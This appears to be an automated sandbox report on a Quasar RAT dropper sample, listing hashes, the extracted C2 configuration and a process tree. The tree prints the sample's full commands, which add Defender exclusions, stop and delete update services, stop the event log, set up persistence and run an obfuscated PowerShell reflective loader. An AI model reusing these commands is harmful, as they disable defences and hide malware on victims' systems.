Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/01/2025, 03:35

General

  • Target

    647fb95e4fbe4daaaff5dd81e69c2cef8c12d8f5a6f7c95d88f67de72e542b06.exe

  • Size

    4.9MB

  • MD5

    3b1bf937711e0b1f3b6e455d535cc4f0

  • SHA1

    c13cd57da269a9c84f63787c87a2e503bb154ac7

  • SHA256

    647fb95e4fbe4daaaff5dd81e69c2cef8c12d8f5a6f7c95d88f67de72e542b06

  • SHA512

    2805b2e4f3fdce85dea17a355e559073db2bd00e4788d667a3cdf7cde9e77a459545a7494253fe0fc540cbc89c19e599b1616bd7a185cdd4000b01a6354e99f4

  • SSDEEP

    98304:j3GvI7nzlAi52DH1Emy/+hpC7FBV0CCqXqoOONza/IIA2ZeN9zE1m7:j3GvuSiIDHbM+G7Ff0s5NoIIA2M9w1w

Malware Config

Extracted

Family

quasar

Version

1.4.0

Botnet

4Drun

C2

185.148.3.216:4000

Mutex

c3557859-56ac-475e-b44d-e1b60c20d0d0

Attributes
  • encryption_key

    B000736BEBDF08FC1B6696200651882CF57E43E7

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    3dfx Startup

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 6 IoCs
  • Power Settings 1 TTPs 18 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 15 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 6 IoCs
  • Launches sc.exe 24 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:612
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:336
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{4b5e1ed0-0992-488c-a6da-dede6fe85f08}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:5104
        • C:\Windows\SysWOW64\dllhost.exe
          C:\Windows\SysWOW64\dllhost.exe /Processid:{09048d72-3216-4b31-90fe-2c089f752971}
          2⤵
          • System Location Discovery: System Language Discovery
          PID:1608
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:676
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:952
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:404
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:1020
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                1⤵
                • Drops file in Windows directory
                PID:1116
                • C:\Windows\system32\taskhostw.exe
                  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                  2⤵
                    PID:2908
                  • C:\Program Files\Cuis\bon\Bara.exe
                    "C:\Program Files\Cuis\bon\Bara.exe"
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:1508
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                      3⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Drops file in System32 directory
                      • Modifies data under HKEY_USERS
                      PID:2236
                      • C:\Windows\System32\Conhost.exe
                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        4⤵
                          PID:2352
                      • C:\Windows\system32\cmd.exe
                        cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                        3⤵
                          PID:4832
                          • C:\Windows\System32\Conhost.exe
                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            4⤵
                              PID:3828
                            • C:\Windows\system32\sc.exe
                              sc stop UsoSvc
                              4⤵
                              • Launches sc.exe
                              PID:2844
                            • C:\Windows\system32\sc.exe
                              sc stop WaaSMedicSvc
                              4⤵
                              • Launches sc.exe
                              PID:636
                            • C:\Windows\system32\sc.exe
                              sc stop wuauserv
                              4⤵
                              • Launches sc.exe
                              PID:3788
                            • C:\Windows\system32\sc.exe
                              sc stop bits
                              4⤵
                              • Launches sc.exe
                              PID:2504
                            • C:\Windows\system32\sc.exe
                              sc stop dosvc
                              4⤵
                              • Launches sc.exe
                              PID:1444
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                              4⤵
                                PID:2836
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                4⤵
                                  PID:460
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                  4⤵
                                    PID:736
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                    4⤵
                                      PID:4936
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                      4⤵
                                        PID:2216
                                    • C:\Windows\system32\cmd.exe
                                      cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                      3⤵
                                      • Power Settings
                                      PID:1160
                                      • C:\Windows\System32\Conhost.exe
                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        4⤵
                                          PID:508
                                        • C:\Windows\system32\powercfg.exe
                                          powercfg /x -hibernate-timeout-ac 0
                                          4⤵
                                          • Power Settings
                                          PID:4452
                                        • C:\Windows\system32\powercfg.exe
                                          powercfg /x -hibernate-timeout-dc 0
                                          4⤵
                                          • Power Settings
                                          PID:2412
                                        • C:\Windows\system32\powercfg.exe
                                          powercfg /x -standby-timeout-ac 0
                                          4⤵
                                          • Power Settings
                                          PID:1344
                                        • C:\Windows\system32\powercfg.exe
                                          powercfg /x -standby-timeout-dc 0
                                          4⤵
                                          • Power Settings
                                          PID:3340
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }
                                        3⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in System32 directory
                                        • Modifies data under HKEY_USERS
                                        PID:2280
                                        • C:\Windows\System32\Conhost.exe
                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          4⤵
                                            PID:2664
                                        • C:\Windows\system32\dialer.exe
                                          C:\Windows\system32\dialer.exe ujznpffbjbh
                                          3⤵
                                            PID:4716
                                            • C:\Windows\system32\cmd.exe
                                              cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                              4⤵
                                              • Drops file in Program Files directory
                                              PID:4736
                                              • C:\Windows\System32\Conhost.exe
                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                5⤵
                                                  PID:2084
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  wmic PATH Win32_VideoController GET Name, VideoProcessor
                                                  5⤵
                                                  • Detects videocard installed
                                                  PID:932
                                            • C:\Windows\system32\cmd.exe
                                              cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                              3⤵
                                              • Drops file in Program Files directory
                                              PID:2980
                                              • C:\Windows\System32\Conhost.exe
                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                4⤵
                                                  PID:4860
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                                              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                                              2⤵
                                              • System Location Discovery: System Language Discovery
                                              • Modifies data under HKEY_USERS
                                              PID:4248
                                              • C:\Windows\System32\Conhost.exe
                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                3⤵
                                                  PID:3840
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                                                2⤵
                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                • Drops file in System32 directory
                                                • Suspicious use of SetThreadContext
                                                • Modifies data under HKEY_USERS
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:512
                                                • C:\Windows\System32\Conhost.exe
                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  3⤵
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:2532
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                              1⤵
                                                PID:1124
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                1⤵
                                                  PID:1132
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                  1⤵
                                                    PID:1176
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                    1⤵
                                                      PID:1232
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                      1⤵
                                                        PID:1308
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                        1⤵
                                                          PID:1336
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                          1⤵
                                                            PID:1404
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                            1⤵
                                                              PID:1496
                                                              • C:\Windows\system32\sihost.exe
                                                                sihost.exe
                                                                2⤵
                                                                  PID:2684
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                                1⤵
                                                                  PID:1544
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                                  1⤵
                                                                    PID:1552
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                                    1⤵
                                                                      PID:1644
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                                      1⤵
                                                                        PID:1736
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                                        1⤵
                                                                          PID:1756
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                                          1⤵
                                                                            PID:1820
                                                                          • C:\Windows\System32\svchost.exe
                                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                            1⤵
                                                                              PID:1904
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                                              1⤵
                                                                                PID:1956
                                                                              • C:\Windows\System32\svchost.exe
                                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                                1⤵
                                                                                  PID:1972
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                                  1⤵
                                                                                    PID:1472
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                                                    1⤵
                                                                                      PID:1632
                                                                                    • C:\Windows\System32\svchost.exe
                                                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                                      1⤵
                                                                                        PID:2088
                                                                                      • C:\Windows\System32\spoolsv.exe
                                                                                        C:\Windows\System32\spoolsv.exe
                                                                                        1⤵
                                                                                          PID:2164
                                                                                        • C:\Windows\System32\svchost.exe
                                                                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                                          1⤵
                                                                                            PID:2300
                                                                                          • C:\Windows\System32\svchost.exe
                                                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                                            1⤵
                                                                                              PID:2392
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                                              1⤵
                                                                                                PID:2544
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                                                1⤵
                                                                                                  PID:2552
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                                  1⤵
                                                                                                    PID:2696
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                                                    1⤵
                                                                                                    • Drops file in System32 directory
                                                                                                    PID:2744
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                                    1⤵
                                                                                                      PID:2772
                                                                                                    • C:\Windows\sysmon.exe
                                                                                                      C:\Windows\sysmon.exe
                                                                                                      1⤵
                                                                                                        PID:2796
                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                                        1⤵
                                                                                                          PID:2816
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                                          1⤵
                                                                                                            PID:2824
                                                                                                          • C:\Windows\system32\wbem\unsecapp.exe
                                                                                                            C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                                            1⤵
                                                                                                              PID:3040
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                                              1⤵
                                                                                                                PID:3060
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                                1⤵
                                                                                                                  PID:3376
                                                                                                                • C:\Windows\Explorer.EXE
                                                                                                                  C:\Windows\Explorer.EXE
                                                                                                                  1⤵
                                                                                                                    PID:3436
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\647fb95e4fbe4daaaff5dd81e69c2cef8c12d8f5a6f7c95d88f67de72e542b06.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\647fb95e4fbe4daaaff5dd81e69c2cef8c12d8f5a6f7c95d88f67de72e542b06.exe"
                                                                                                                      2⤵
                                                                                                                      • Checks computer location settings
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:4748
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Tbcelsmfm.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Tbcelsmfm.exe"
                                                                                                                        3⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Drops file in System32 directory
                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                        PID:4512
                                                                                                                        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                          4⤵
                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:1192
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                          4⤵
                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                          PID:3444
                                                                                                                          • C:\Windows\system32\wusa.exe
                                                                                                                            wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                            5⤵
                                                                                                                              PID:3724
                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                            C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                            4⤵
                                                                                                                            • Launches sc.exe
                                                                                                                            PID:2808
                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                            C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                            4⤵
                                                                                                                            • Launches sc.exe
                                                                                                                            PID:2472
                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                            C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                            4⤵
                                                                                                                            • Launches sc.exe
                                                                                                                            PID:2984
                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                            C:\Windows\system32\sc.exe stop bits
                                                                                                                            4⤵
                                                                                                                            • Launches sc.exe
                                                                                                                            PID:2456
                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                            C:\Windows\system32\sc.exe stop dosvc
                                                                                                                            4⤵
                                                                                                                            • Launches sc.exe
                                                                                                                            PID:1420
                                                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                                                            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                            4⤵
                                                                                                                            • Power Settings
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:3620
                                                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                                                            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                            4⤵
                                                                                                                            • Power Settings
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:4684
                                                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                            4⤵
                                                                                                                            • Power Settings
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:4636
                                                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                            4⤵
                                                                                                                            • Power Settings
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:4104
                                                                                                                          • C:\Windows\system32\dialer.exe
                                                                                                                            C:\Windows\system32\dialer.exe
                                                                                                                            4⤵
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                            PID:60
                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                            C:\Windows\system32\sc.exe delete "WAGDKRVZ"
                                                                                                                            4⤵
                                                                                                                            • Launches sc.exe
                                                                                                                            PID:1428
                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                            C:\Windows\system32\sc.exe create "WAGDKRVZ" binpath= "C:\ProgramData\mxergolzfguk\kaptsegthwf.exe" start= "auto"
                                                                                                                            4⤵
                                                                                                                            • Launches sc.exe
                                                                                                                            PID:3928
                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                            C:\Windows\system32\sc.exe stop eventlog
                                                                                                                            4⤵
                                                                                                                            • Launches sc.exe
                                                                                                                            PID:5012
                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                            C:\Windows\system32\sc.exe start "WAGDKRVZ"
                                                                                                                            4⤵
                                                                                                                            • Launches sc.exe
                                                                                                                            PID:744
                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              5⤵
                                                                                                                                PID:1164
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\lgigivedpdvfs.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\lgigivedpdvfs.exe"
                                                                                                                            3⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            • Drops file in Program Files directory
                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                            PID:1000
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                              4⤵
                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:4916
                                                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                              cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                                                                              4⤵
                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                              PID:1732
                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                sc stop UsoSvc
                                                                                                                                5⤵
                                                                                                                                • Launches sc.exe
                                                                                                                                PID:508
                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                sc stop WaaSMedicSvc
                                                                                                                                5⤵
                                                                                                                                • Launches sc.exe
                                                                                                                                PID:1504
                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                sc stop wuauserv
                                                                                                                                5⤵
                                                                                                                                • Launches sc.exe
                                                                                                                                PID:224
                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                sc stop bits
                                                                                                                                5⤵
                                                                                                                                • Launches sc.exe
                                                                                                                                PID:4384
                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                sc stop dosvc
                                                                                                                                5⤵
                                                                                                                                • Launches sc.exe
                                                                                                                                PID:2400
                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                                                                                                                5⤵
                                                                                                                                  PID:4644
                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                                                                                                                  5⤵
                                                                                                                                    PID:4472
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                                                                                                                    5⤵
                                                                                                                                      PID:4388
                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                                                                                                                      5⤵
                                                                                                                                        PID:4896
                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                                                                                        5⤵
                                                                                                                                          PID:3560
                                                                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                        cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                                                                                        4⤵
                                                                                                                                        • Power Settings
                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                        PID:2364
                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                          powercfg /x -hibernate-timeout-ac 0
                                                                                                                                          5⤵
                                                                                                                                          • Power Settings
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:4276
                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                          powercfg /x -hibernate-timeout-dc 0
                                                                                                                                          5⤵
                                                                                                                                          • Power Settings
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:2336
                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                          powercfg /x -standby-timeout-ac 0
